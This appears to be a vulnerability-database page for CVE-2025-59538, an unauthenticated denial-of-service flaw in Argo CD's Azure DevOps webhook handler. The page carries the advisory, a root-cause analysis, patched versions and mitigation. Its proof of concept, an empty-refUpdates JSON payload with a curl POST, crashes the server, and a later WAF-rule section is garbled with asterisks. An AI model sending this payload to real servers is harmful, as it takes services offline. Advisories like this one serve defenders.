7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-59538

GHSA ID

GHSA-gpx4-37g2-c8pv

EPSS Score

CWE

CWE-248

Published

9/30/2025

Updated

9/30/2025

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-59538

CVE-2025-59538: Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook

Summary

In the default configuration, webhook.azuredevops.username and webhook.azuredevops.password not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.

The slice index [0] is accessed without a length check, causing an index-out-of-range panic.

A single unauthenticated HTTP POST is enough to kill the process.

Details

case azuredevops.GitPushEvent:
    // util/webhook/webhook.go -- line ≈147
    revision        = ParseRevision(payload.Resource.RefUpdates[0].Name)        // panics if slice empty
    change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)
    change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)
    touchedHead     = payload.Resource.RefUpdates[0].Name ==
                      payload.Resource.Repository.DefaultBranch

If the attacker supplies "refUpdates": [], the slice has length 0.

The webhook code has no recover(), so the panic terminates the entire binary.

PoC

payload-azure-empty.json:

{
  "eventType": "git.push",
  "resource": {
    "refUpdates": [],
    "repository": {
      "remoteUrl": "https://example.com/dummy",
      "defaultBranch": "refs/heads/master"
    }
  }
}

curl call:

curl -k -X POST https://argocd.example.com/api/webhook \
     -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \
     -H 'Content-Type: application/json' \
     --data-binary @payload-azure-empty.json

Observed crash:

panic: runtime error: index out of range [0] with length 0

goroutine 205 [running]:
github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo
    webhook.go:147 +0x1ea5
...

Mitigation

If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.azuredevops.username: <your base64-encoded secret here>
+  webhook.azuredevops.password: <your base64-encoded secret here>

For more information

Open an issue in the Argo CD issue tracker or discussions
Join us on Slack in channel #argo-cd

Credits

Discovered by Jakub Ciolek at AlphaSense.

(GitHub Advisory)

7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-59538

GHSA ID

GHSA-gpx4-37g2-c8pv

EPSS Score

CWE

CWE-248

Published

9/30/2025

Updated

9/30/2025

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/argoproj/argo-cd/v2	go	>= 2.9.0-rc1, <= 2.14.19	2.14.20
github.com/argoproj/argo-cd/v3	go	= 3.2.0-rc1	3.2.0-rc2
github.com/argoproj/argo-cd/v3	go	>= 3.1.0-rc1, <= 3.1.7	3.1.8
github.com/argoproj/argo-cd/v3	go	>= 3.0.0-rc1, <= 3.0.18	3.0.19

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability lies in the affectedRevisionInfo function within util/webhook/webhook.go. The provided vulnerability description explicitly points out the code snippet where an index-out-of-range panic occurs when processing an Azure DevOps git.push webhook. The panic happens because the code accesses payload.Resource.RefUpdates[0] without verifying that the RefUpdates slice is not empty. The provided commit 1a023f1ca7fe4ec942b4b6696804988d5a632baf confirms this by adding a length check (if len(payload.Resource.RefUpdates) > 0) before the vulnerable code block. The crash log also confirms the vulnerable function is github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo. Since affectedRevisionInfo is a method of the ArgoCDWebhookHandler struct, the function name that would appear in a Go profiler is ArgoCDWebhookHandler.affectedRevisionInfo.

Vulnerable functions

ArgoCDWebhookHandler.affectedRevisionInfo

util/webhook/webhook.go

The function `affectedRevisionInfo` processes webhook payloads. In the case of an Azure DevOps `git.push` event, the code directly accesses the first element of the `RefUpdates` slice (`payload.Resource.RefUpdates[0]`) without checking if the slice is empty. An attacker can send a specially crafted webhook with an empty `refUpdates` array, causing a panic (index out of range) and crashing the Argo CD server process, leading to a denial of service.

WAF Protection Rules

WAF Rule

### Summ*ry In t** ****ult *on*i*ur*tion, `w***ook.*zur***vops.us*rn*m*` *n* `w***ook.*zur***vops.p*sswor*` not s*t, *r*o **’s /*pi/w***ook *n*point *r*s**s t** *ntir* *r*o**-s*rv*r pro**ss w**n it r***iv*s *n *zur* **vOps Pus* *v*nt w*os* JSON *rr*

Reasoning

T** vuln*r**ility li*s in t** `*****t**R*visionIn*o` *un*tion wit*in `util/w***ook/w***ook.*o`. T** provi*** vuln*r**ility **s*ription *xpli*itly points out t** *o** snipp*t w**r* *n in**x-out-o*-r*n** p*ni* o**urs w**n pro**ssin* *n *zur* **vOps `*i

7.5

Basic Information

Concerned about an active attack path?

CVE-2025-59538: Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook

Summary

Details

PoC

Mitigation

For more information

Credits

7.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI